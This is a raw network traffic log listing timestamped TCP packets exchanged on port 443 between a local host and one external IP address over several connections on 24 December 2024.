Dec 24, 2024 15:12:57.521526098 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:57.521542072 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:12:59.846066952 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:12:59.846151114 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:59.846807957 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:12:59.849754095 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:59.902930975 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:59.902954102 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:12:59.903326988 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:12:59.905642033 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:59.908324003 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:59.955327988 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.498347998 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.498377085 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.498450994 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.498476982 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.498543978 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.509655952 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.509715080 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.524665117 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.524718046 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.541563034 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.541635036 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.692262888 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.692322016 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.699891090 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.699947119 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.715059996 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.715137959 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.729811907 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.729870081 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.737581015 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.737642050 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.744707108 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.744750023 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.744760036 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.744772911 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.744815111 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.744913101 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.744930983 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:00.744940042 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:00.744971991 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:02.423618078 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:02.423712015 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:02.423832893 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:02.424158096 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:02.424196005 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:04.712222099 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:04.712332010 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:04.734353065 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:04.734407902 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:04.736396074 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:04.736412048 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.309937954 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.310046911 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.310110092 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.310173035 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.310189009 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.310213089 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.310240984 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.310270071 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.310904980 CET	49751	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.310934067 CET	443	49751	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.323268890 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.323301077 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:05.323375940 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.323753119 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:05.323769093 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:10.661483049 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:10.661689997 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:10.662329912 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:10.662343979 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:10.662532091 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:10.662539005 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.253079891 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.253118038 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.253174067 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.253190994 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.253206015 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.253236055 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.269592047 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.269675970 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.286276102 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.286396027 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.294841051 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.294898033 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.446542978 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.446628094 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.454122066 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.454200029 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.469146013 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.469213963 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.483740091 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.483808041 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.491463900 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.491543055 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.506573915 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.506650925 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.521007061 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.521063089 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.528907061 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.528974056 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.543560028 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.543626070 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.550884008 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.550942898 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.550956011 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.550988913 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.567168951 CET	49757	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.567188025 CET	443	49757	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.617615938 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.617645979 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:11.617717981 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.619827032 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:11.619843960 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:13.921474934 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:13.921734095 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:13.959903955 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:13.959909916 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:13.960118055 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:13.960123062 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.541279078 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.541306973 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.541333914 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.541347027 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.541362047 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.541404963 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.560883045 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.560940981 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.569267988 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.569327116 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.586111069 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.586194992 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.736788034 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.736872911 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.747426033 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.747498035 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.763092995 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.763168097 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.770199060 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.770370007 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.785203934 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.785278082 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.800467968 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.800525904 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.808063030 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.808121920 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.823183060 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.823249102 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.838376045 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.838430882 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.928030014 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.928134918 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.936943054 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.937115908 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.943470955 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.943540096 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.955030918 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.955091953 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.966173887 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.966243982 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.971560955 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.971620083 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.981692076 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.981754065 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.991871119 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.991930962 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:14.996877909 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:14.996939898 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.006923914 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.006982088 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.016884089 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.016999960 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.021960974 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.022021055 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.032207966 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.032274961 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.041973114 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.042053938 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.047765970 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.047844887 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.057179928 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.057245016 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.119492054 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.119596958 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.126786947 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.126893997 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.134233952 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.134313107 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.138166904 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.138226032 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.144817114 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.144875050 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.151406050 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.151482105 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.154787064 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.154849052 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.160928965 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.160979986 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.167054892 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.167156935 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.170281887 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.170340061 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.176095963 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.176156998 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.181881905 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.181938887 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.184966087 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.185019016 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.190658092 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.190718889 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.196149111 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.196201086 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.199115992 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.199187994 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.204855919 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.204899073 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.210560083 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.210606098 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.213351011 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.213395119 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.220566034 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.220623970 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.223232031 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.223294973 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.229167938 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.229217052 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.311580896 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.311656952 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.313868999 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.313918114 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.317509890 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.317560911 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.321198940 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.321260929 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.323432922 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.323478937 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.328798056 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.328866005 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.331237078 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.331284046 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.334074974 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.334116936 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.335933924 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.335983038 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.339214087 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.339262009 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.342763901 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.342808008 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.344456911 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.344508886 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.347696066 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.347744942 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.351198912 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.351247072 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.352771997 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.352822065 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.355928898 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.355973959 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.359517097 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.359601974 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.361012936 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.361068010 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.364046097 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.364099026 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.366530895 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.366585016 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.369635105 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.369685888 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.372966051 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.373028994 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.374835968 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.374907017 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.377616882 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.377696991 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.380894899 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.380959988 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.382889986 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.382951021 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.385818005 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.385870934 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.388945103 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.389004946 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.390564919 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.390620947 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.393708944 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.393758059 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.501068115 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.501116991 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.501851082 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.501898050 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.504270077 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.504328012 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.506675005 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.506722927 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.508199930 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.508245945 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.510690928 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.510740995 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.513073921 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.513120890 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.515106916 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.515149117 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.516482115 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.516539097 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.518326998 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.518378019 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.519484043 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.519531965 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.521900892 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.521945000 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.524425983 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.524466038 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.526070118 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.526130915 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.527249098 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.527307034 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.529551983 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.529608965 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.531686068 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.531733990 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.533138990 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.533190012 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.535021067 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.535067081 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.537472010 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.537527084 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.539307117 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.539366961 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.541347980 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.541405916 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.542536974 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.542593002 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.544524908 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.544581890 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.546724081 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.546775103 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.549000978 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.549063921 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.549997091 CET	443	49773	118.178.60.9	192.168.2.4
